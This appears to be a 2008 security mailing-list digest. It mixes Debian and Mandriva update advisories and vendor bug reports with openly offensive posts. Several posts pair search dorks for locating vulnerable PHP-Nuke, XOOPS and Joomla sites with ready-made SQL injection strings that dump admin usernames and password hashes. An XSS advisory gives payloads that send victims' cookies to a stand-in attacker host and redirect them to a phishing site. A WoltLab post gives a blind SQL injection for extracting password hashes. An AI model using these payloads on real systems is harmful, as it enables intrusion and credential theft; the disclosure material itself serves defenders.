[SECURITY] [DSA 1499-1] New pcre3 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1499-1 [EMAIL PROTECTED] http://www.debian.org/security/ Florian Weimer February 19, 2008 http://www.debian.org/security/faq - Package: pcre3 Vulnerability : buffer overflow Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2008-0674 It was discovered that specially crafted regular expressions involving codepoints greater than 255 could cause a buffer overflow in the PCRE library (CVE-2008-0674). For the stable distribution (etch), this problem has been fixed in version 6.7+7.4-3. For the old stable distribution (sarge), this problem has been fixed in version 4.5+7.4-2. For the unstable distribution, thi problem has been fixed in version 7.6-1. We recommend that you upgrade your pcre3 package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-2.diff.gz Size/MD5 checksum:99934 750cb82053d0d184e96b6f2256b07259 http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4-2.dsc Size/MD5 checksum: 883 6d7166721448553dfe9672bdbb6c75c2 http://security.debian.org/pool/updates/main/p/pcre3/pcre3_4.5+7.4.orig.tar.gz Size/MD5 checksum: 1106897 de886b22cddc8eaf620a421d3041ee0b Architecture independent packages: http://security.debian.org/pool/updates/main/p/pcre3/pgrep_4.5+7.4-2_all.deb Size/MD5 checksum: 764 f45e8c3460a8e966a1de6dd1f8499beb alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_alpha.deb Size/MD5 checksum: 191228 b56575e6599f47fceeffbec81ae4badd http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_alpha.deb Size/MD5 checksum: 218268 d4c05de57eafe479d07b84c99cd2 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_alpha.deb Size/MD5 checksum:21346 6cb3b9513b0acdc11b2b62524d0c996e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_amd64.deb Size/MD5 checksum: 181858 eaf65286f24f2eda0c5c2b0cf59d2e93 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_amd64.deb Size/MD5 checksum:19814 abef692f2c4fd08c8564986bef855f57 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_amd64.deb Size/MD5 checksum: 206374 23d917983de3d901cdbc021d707bb6fd arm architecture (ARM) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_arm.deb Size/MD5 checksum: 183712 6e6d063b597e869a4a214e5175cfc7b1 http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_arm.deb Size/MD5 checksum: 209636 164c9c155f8c2704cebfd8798bd8d754 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_arm.deb Size/MD5 checksum:19398 d0a3bf731aa86aa6edd0288bf5f2a3d7 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_hppa.deb Size/MD5 checksum: 208450 0b05321a818bfb34d17ff2baeaba6601 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_hppa.deb Size/MD5 checksum:21022 3ed44e57de9d68aeab7d4da4c40c2eac http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_hppa.deb Size/MD5 checksum: 190888 671eb5283ff2527047d4b180ad6aee67 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3_4.5+7.4-2_i386.deb Size/MD5 checksum: 184086 5ad41047b80b2b9846c395e6f452b497 http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_i386.deb Size/MD5 checksum:19024 ae71a5aa7677abddc6fbb5f1d69315be http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_i386.deb Size/MD5 checksum: 206252 06a244ad5aed436a119db629b6f5a469 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/p/pcre3/libpcre3-dev_4.5+7.4-2_ia64.deb Size/MD5 checksum: 228562 f1bc6cb07937b17adb7af5f9186cd7ed http://security.debian.org/pool/updates/main/p/pcre3/pcregrep_4.5+7.4-2_ia64.deb Size/MD5 checksum:24750 c2340f5c62f546e6fa0bcdb2cbc9bd3e http://security.debian.org/pool/updates/main/p/pcr
Access violation and limited informations disclosure in webcamXP 3.72.440.0
### Luigi Auriemma Application: webcamXP http://www.webcamxp.com Versions: <= 3.72.440.0 <= beta 4.05.280 Platforms:Windows Bug: access violation with limited informations disclosure Exploitation: remote Date: 18 Feb 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === webcamXP is a commercial webcam software with an integrated webserver for sharing the own videos. ### == 2) Bug == The pocketpc and show_gallery_pic URI are used by the external users for watching the images of the current webcams. The problem is that there are no checks on the webcam's number passed by the client allowing an attacker to go outside the array which contains all the data about each webcam. The main effect of this bug is the silent interruption of the service due to the access violation caused by the reading of unallocated memory and visible in the browser of the client who has performed the malicious request. For example /pocketpc allows to access the memory above and below offset 007196f0 (the location of the array in version 3.72.440.0) with steps of 6360 bytes for each webcam number. The secondary effect is the possibility of reading 8 bytes of the process's memory in a partial arbitrary way (the array's offset is fixed but is only possible to jump 6360 bytes at time) since /pocketpc displays these two 32 bit numbers in the "width" and "height" parameters of the returned HTML page as visible in the assembly code starting from offset 006BD46F. ### === 3) The Code === http://SERVER:8080/pocketpc?camnum=99&mode=0 http://SERVER:8080/pocketpc?camnum=-99&mode=0 http://SERVER:8080/show_gallery_pic?id=99 ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org
Two heap overflow in Foxit WAC Server 2.0 Build 3503
### Luigi Auriemma Application: Foxit Remote Access Server (WAC Server) http://www.foxitsoft.com/wac/server_intro.php Versions: <= 2.0 Build 3503 Platforms:Windows Bugs: A] telnet option heap overflow B] SSH packet heap overflow Exploitation: remote Date: 16 Feb 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bugs 3) The Code 4) Fix ### === 1) Introduction === WAC is a commercial SSH/telnet server for Windows. ### === 2) Bugs === -- A] telnet option heap overflow -- The WAC server is vulnerable to a heap overflow exploitable through the usage of options longer than 260 bytes. Note: this bug was wrongly reported by me as a crash and with a wrong server version one month ago. --- B] SSH packet heap overflow --- The server is affected also by another heap overflow exploitable through big SSH packets, anyway no deeper research has been performed on this vulnerability. ### === 3) The Code === http://aluigi.org/poc/wachof.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org
Multiple buffer-overflow in NowSMS v2007.06.27
### Luigi Auriemma Application: Now SMS/MMS Gateway http://www.nowsms.com Versions: <= v2007.06.27 Platforms:Windows Bugs: A] web authorization buffer-overflow B] SMPP buffer-overflow Exploitation: remote Date: 19 Feb 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bugs 3) The Code 4) Fix ### === 1) Introduction === NowSMS is a commercial SMS and MMS Content Delivery Solution. ### === 2) Bugs === A] web authorization buffer-overflow The web interface of NowSMS which listens on port 8800 allows the users to use the gateway for sending various types of messages (EMS, binary, WAP, MMS and so on). The function which handles the base64 password located in the HTTP Authorization parameter is affected by a stack based buffer-overflow exploitable with more than 256 bytes. The server can be exploited both in case it requires and doesn't require authentication. --- B] SMPP buffer-overflow --- NowSMS uses a stack buffer of 4 kilobytes for containing the incoming SMPP packets. The lack of checks on the real size of these packets (max 0x bytes) leads to a buffer-overflow vulnerability which can be exploited by an attacker to execute malicious code remotely. The SMPP server is not enabled by default and doesn't have a default listening port (the admin must decide it). ### === 3) The Code === http://aluigi.org/poc/nowsmsz.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org
NULL pointer crash in freeSSHd 1.20
### Luigi Auriemma Application: freeSSHd http://www.freesshd.com Note: is possible that the problem affects also wodSSHServer anyway this has not been tested Versions: <= 1.2.0 Platforms:Windows Bug: NULL pointer crash Exploitation: remote Date: 17 Feb 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === freeSSHd is a free SSH server for Windows. ### == 2) Bug == The server can be crashed through a NULL pointer access simply sending a SSH2_MSG_NEWKEYS packet as first command. ### === 3) The Code === http://aluigi.org/poc/freesshdnull.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org
[ MDVSA-2007:047 ] - Updated Thunderbird packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2007:047 http://www.mandriva.com/security/ ___ Package : mozilla-thunderbird Date: February 19, 2008 Affected: 2007.1, 2008.0 ___ Problem Description: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 2.0.0.9. This update provides the latest Thunderbird to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3734 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3735 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3844 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3845 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5339 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5340 http://www.mozilla.org/security/announce/2007/mfsa2007-18.html http://www.mozilla.org/security/announce/2007/mfsa2007-26.html http://www.mozilla.org/security/announce/2007/mfsa2007-27.html http://www.mozilla.org/security/announce/2007/mfsa2007-29.html ___ Updated Packages: Mandriva Linux 2007.1: b96d9da80acc0346a7c0f5bd11030d7f 2007.1/i586/mozilla-thunderbird-2.0.0.9-6mdv2007.1.i586.rpm b0d3c696fe920e09d6256efbb3db25fa 2007.1/i586/mozilla-thunderbird-be-2.0.0.9-1mdv2007.1.i586.rpm ab7eef3f6b8fdca732f779c7e2f0b322 2007.1/i586/mozilla-thunderbird-bg-2.0.0.9-1mdv2007.1.i586.rpm f6fc86b8141369a3e290da2b01b47010 2007.1/i586/mozilla-thunderbird-ca-2.0.0.9-1mdv2007.1.i586.rpm b496b6d9cf7246c27ff53df2912eb005 2007.1/i586/mozilla-thunderbird-cs-2.0.0.9-1mdv2007.1.i586.rpm ffadbb5a5f02957ffdf69c224ded2b2b 2007.1/i586/mozilla-thunderbird-da-2.0.0.9-1mdv2007.1.i586.rpm 010ffcaf2e035107671316a7bd4e3b46 2007.1/i586/mozilla-thunderbird-de-2.0.0.9-1mdv2007.1.i586.rpm a378cbb3ba9b698802a1fc752a11e385 2007.1/i586/mozilla-thunderbird-devel-2.0.0.9-6mdv2007.1.i586.rpm 1857892f2cfab96d63cc5fda072f0e81 2007.1/i586/mozilla-thunderbird-el-2.0.0.9-1mdv2007.1.i586.rpm 53f67a0c72556e0b827cb24ecc68120f 2007.1/i586/mozilla-thunderbird-en_GB-2.0.0.9-1mdv2007.1.i586.rpm 984ae64be68fef1879e04c29e266f1b5 2007.1/i586/mozilla-thunderbird-enigmail-2.0.0.9-6mdv2007.1.i586.rpm be260fbf08a4be05c80f188ac751ffc0 2007.1/i586/mozilla-thunderbird-enigmail-ca-2.0.0.9-2.1mdv2007.1.i586.rpm 9c5fa8498bd524ccff51c14a3c8d1f42 2007.1/i586/mozilla-thunderbird-enigmail-cs-2.0.0.9-2.1mdv2007.1.i586.rpm 9d0be6fcb33730bf9d5e347442311a06 2007.1/i586/mozilla-thunderbird-enigmail-de-2.0.0.9-2.1mdv2007.1.i586.rpm 5e282858faf3da86cf78d03c93f69944 2007.1/i586/mozilla-thunderbird-enigmail-el-2.0.0.9-2.1mdv2007.1.i586.rpm 4c3cc6630884ae3ca447aaee74bc0555 2007.1/i586/mozilla-thunderbird-enigmail-es-2.0.0.9-2.1mdv2007.1.i586.rpm e4192f82171cd8c7bd04206a101d7abe 2007.1/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.9-2.1mdv2007.1.i586.rpm a8fe35494cf7d215c9ce5dab12107eac 2007.1/i586/mozilla-thunderbird-enigmail-fi-2.0.0.9-2.1mdv2007.1.i586.rpm f9df5f2163da1e3732376b19e68a7af3 2007.1/i586/mozilla-thunderbird-enigmail-fr-2.0.0.9-2.1mdv2007.1.i586.rpm e31dbf8e790ce386475baa4af85e99f2 2007.1/i586/mozilla-thunderbird-enigmail-hu-2.0.0.9-2.1mdv2007.1.i586.rpm 0601aef71690fb65f5c54d179f93ba4a 2007.1/i586/mozilla-thunderbird-enigmail-it-2.0.0.9-2.1mdv2007.1.i586.rpm 458e412c2a76d352e74a1283345f951c 2007.1/i586/mozilla-thunderbird-enigmail-ja-2.0.0.9-2.1mdv2007.1.i586.rpm f19022391b980409dcf5c78889e20fb9 2007.1/i586/mozilla-thunderbird-enigmail-ko-2.0.0.9-2.1mdv2007.1.i586.rpm 05611c548151875834a26629cfad 2007.1/i586/mozilla-thunderbird-enigmail-nb-2.0.0.9-2.1mdv2007.1.i586.rpm b045de8ff550e1b1486cd49f38c2f02a 2007.1/i586/mozilla-thunderbird-enigmail-nl-2.0.0.9-2.1mdv2007.1.i586.rpm 415fdc3c322eaa0be6cd9e44e54cb3b1 2007.1/i586/mozilla-thunderbird-enigmail-pl-2.0.0.9-2.1mdv2007.1.i586.rpm f2447079be116f3d128690d371d87deb 2007.1/i586/mozilla-thunderbird-enigmail-pt-2.0.0.9-2.1mdv2007.1.i586.rpm adda02c8e6cbae341880bdb275154db2 2007.1/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.9-2.1mdv2007.1.i586.rpm 4049e9db5ace0730027d18a3fa014229 2007.1/i586/mozilla-thunderbird-enigmail-ro-2.0.0.9-2.1mdv2007.1.i586.rpm df97b386da66168bf42b640fb0d84cf2 2007.1/i586/mozilla-thunderbird-enigmail-ru-2.0.0.9-2.1mdv2007.1.i586.rpm e578119fa67a0cf13c36fac3066c36e8 2007.1/i586/mozilla-thunderbird-enigmail-sk-2.0.0.9-2.1mdv2007.1.i586.rpm 80434ce9a5c4699aa17ed49ce85be603 2007.1/i586/mozilla-thunderbird-enigmail-sl-2.0.0.9-2.1mdv2007.1.i586.rpm 6af367b09a2e7cdb0915b0ae4072acf3 2007.1/i586/mozilla-t
PHP-Nuke Module Web_Links SQL Injection(cid)
### # # PHP-Nuke Module Web_Links SQL Injection(cid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl: file-index modules-php-op-modload-name-Web_Links "l_op viewlink" # DORK 2 : allinurl: cid file-index modules-php-op-modload"l_op viewlink"name-Web_Links example : http://XXX/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid= (exploit) EXPLOİT modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,112,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201=%202 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
[SECURITY] [DSA 1498-1] New libimager-perl packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1498-1 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp February 19, 2008 http://www.debian.org/security/faq - Package: libimager-perl Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-2459 Debian Bug : 421582 It was discovered that libimager-perl, a Perl extension for Generating 24 bit images, did not correctly handle 8-bit per-pixel compressed images, which could allow the execution of arbitrary code. For the stable distribution, this problem has been fixed in version 0.50-1etch1. We recommend that you upgrade your libimager-perl package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1.diff.gz Size/MD5 checksum: 3049 e82e882633056ddef2beec5107085163 http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1.dsc Size/MD5 checksum: 702 a2325e2e5fd0522924e1c394260fb902 http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50.orig.tar.gz Size/MD5 checksum: 757843 19cfffe047909599226f76694155f996 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_alpha.deb Size/MD5 checksum: 648188 54c4d2bfd5fc8db396cf8d9f30ee138e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_amd64.deb Size/MD5 checksum: 610124 06b382fe65e0ab39f66436c9a7574c9e arm architecture (ARM) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_arm.deb Size/MD5 checksum: 589256 185b679c399cbafeae33ceefe39e679c hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_hppa.deb Size/MD5 checksum: 620720 445a0a72c32922d42e7c37afb8c5a361 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_i386.deb Size/MD5 checksum: 605222 38189ae2167604712b8cb74dbefd5f7a ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_ia64.deb Size/MD5 checksum: 751930 17f9e9c322ed61445eea4a7c38b2b0fc mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_mips.deb Size/MD5 checksum: 557940 0e37144272d8f1aed97986e6af175870 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_mipsel.deb Size/MD5 checksum: 556756 b67b32674f7951f62496cce70e079f00 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_s390.deb Size/MD5 checksum: 571872 2472728525f114e0faebc7832eeb66c4 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libi/libimager-perl/libimager-perl_0.50-1etch1_sparc.deb Size/MD5 checksum: 607238 eab7744246cea808db37625cc46aac6f These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHuzlawM/Gs81MDZ0RAnmoAJ4uDJZ/IVXuS3B3+KIo+h22JfA6UwCaA2Nf zc9AiJJUB/Y2QRhRrGyLzwQ= =CIt+ -END PGP SIGNATURE-
XOOPS Module wflinks SQL Injection(cid)
### # #XOOPS Module wflinks SQL Injection(cid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl: modules/wflinks/viewcat.php # # DORK 2 : allinurl: modules/wflinks # example http://xx.com/modules/wflinks/viewcat.php?cid= [exploit] EXPLOIT : -88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
XOOPS Module eEmpregos SQL Injection(cid)
### # # XOOPS Module eEmpregos SQL Injection(cid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl: "modules/eEmpregos/index.php" # # DORK 2 : allinurl: cid "modules/eEmpregos" # example http:///modules/eEmpregos/index.php?pa=view&cid=[exploit] EXPLOIT : -%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
XOOPS Module classifieds SQL Injection(cid)
### # # XOOPS Module classifieds SQL Injection(cid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl: cid"modules/classifieds/index.php?pa=Adsview" # example http:///modules/classifieds/index.php?pa=Adsview&cid=[exploit] EXPLOIT : -0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0x3a,0x3a,concat(uname,0x3a,pass)/**/from+xoops_users/*where%20admin%20-1 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
Re: CSA-L03: Linux kernel vmsplice unchecked user-pointer dereference
A basic malware to exploit this vulnerability: http://si0ux.blogspot.com/2008/02/sara-malware.html
joomla SQL Injection(com_magazine)
### # # joomla SQL Injection(com_magazine) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_magazine"pageid= # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,111,222,333,444,555/**/from/**/jos_users/** # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
XOOPS Module seminars SQL Injection
### # # XOOPS Module seminars SQL Injection # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"modules/seminars/index.php?op=show" # # DORK 2 : allinurl: # EXPLOIT : modules/seminars/index.php?op=show&id=-7/**/union/**/select/**/0x3a,0x3a,0x3a,0x3a,uname,pass,0x3a,0x3a,0x3a/**/from/**/xoops_users/*where%20admin # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
XOOPS Module badliege SQL Injection
### # # XOOPS Module badliege SQL Injection # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"modules/badliege/index.php?op=show" # # DORK 2 : allinurl: # EXPLOIT : modules/badliege/index.php?op=show&id=-999/**/union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from+xoops_users/*where%20admin%20-5 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
XOOPS Module events SQL Injection
### # # XOOPS Module events SQL Injection # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"modules/events/index.php?op=show" # # DORK 2 : allinurl: # EXPLOIT : modules/events/index.php?op=show&id=-+union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from/**/xoops_users/*where%20admin%20-111 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
XOOPS Module vacatures SQL Injection
### # # XOOPS Module vacatures SQL Injection # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"/modules/vacatures/index.php?pa=view" # # DORK 2 : allinurl: # EXPLOIT : modules/vacatures/index.php?pa=view&cid=-0/**/union/**/select/**/,concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/**where%20admin%20-111 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
joomla SQL Injection(com_foevpartners)
### # # joomla SQL Injection(com_foevpartners) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAİL : [EMAIL PROTECTED] # # # DORK 1 : allinurl :"com_foevpartners" # # DORK 2 : allinurl: # EXPLOIT : index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/* # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals
PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals
Description:
BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are
vulnerable to a XSS vulnerability affecting the 'name' parameter which
is submitted to the '/portal/server.pt' server-side script.
Date found: 12th September 2006
Vendor contacted: 18th May 2007
Successfully tested on: BEA Plumtree Foundation 6.0.1.218452.
BEA Systems have confirmed the following versions to be affected:
BEA Plumtree Foundation 6.0 through service pack 1.
BEA AquaLogic Interaction 6.1 through service pack 1.
BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.
Severity: Medium-High
Authors: Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)
ProCheckUp thanks BEA Systems for their co-operation.
Proof of concept:
The following requests launch a JavaScript alert box on the user's web
browser, simply to prove that is possible to run scripting code on the
victim's web browser.
Please note that '%22;}%3C/script%3E' is added at the beginning of every
payload in order to make the overall HTML document syntactically
correct, thus increasing the chance of the attack working on different
web browser types:
https://target-domain.foo/portal/server.pt?open=space&name=alert('CanCrossSiteScript')
https://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--
The following requests allow session hijacking through cookie theft:
https://target-domain.foo/portal/server.pt?open=space&name=window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--
The following requests allow password theft by redirecting to a
third-party 'spoof' site which would perform a phishing attack on the
victim:
https://target-domain.foo/portal/server.pt?open=space&name=window.location="http://phishers-site.foo";
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo%3C/script%3E%3C!--
HTML injection through this XSS vulnerability is also possible. This
allows advanced phishing attacks by inserting a HTML form within the
context of the victim website.
Consequences:
Scripting code can be run within the security context of the target
site. User accounts can be hijacked. Advanced phishing attacks can be
launched.
Note:
This vulnerability could be considered a medium-high risk (rather than
medium risk) in cases in which admin users are targeted, resulting in
the attacker gaining administrative privileges on the target
Plumtree/AquaLogic Portal.
Fix: this issue will be addressed in the 6.5 release of AquaLogic
Interaction.
References:
"ProCheckUp - Security Vulnerabilities"
http://www.procheckup.com/Vulnerabilities.php
BEA's BEA08-186.00 advisory:
"Security Advisories and Notifications"
http://dev2dev.bea.com/advisoriesnotifications/
Legal:
Copyright 2008 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.
Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.
WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability
## WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN Vendor: http://woltlab.de ## ::Proof of Concept http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC, (SELECT password FROM wcf1_user WHERE userID=1 AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(300,MD5(23)),1)) An attacker should have to register at the board to use this. You can ask TRUE/FALSE questions to the database. Modify 300 if the stuff doesn't work. On some MySQL Versions you need to edit this query ::Explain: ...AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(300,MD5(23)),1)) 1,1 is the position in the crypted password. 55 is the char in the ascii-table. In this example we ask for number 7 in the hash, position 1. If the page load fast, you find a true char. If not, ask other chars ;-).If you enter a char that is higher then the true's, the page load fast to, so start from 48 first and go higher. ::Vulnerabiltiy As I found this, WBB 3.0.4 was only running at the supportforums of woltlab so I don't test it, because there is no reason and I am not a cracker ;-) WoltLab Burning Board 3.0.3 PLX WoltLab Burning Board 3.0.2 PLX WoltLab Burning Board 3.0.1 PLX WoltLab Burning Board 3.0.0 PLX Possible WoltLab Burning Board 3.0.4 (not tested)... Please don't use this to crack forums. All what you do with this is at your own risk.
SYMSA-2008-001: Lyris ListManager - Multiple Vulnerabilities
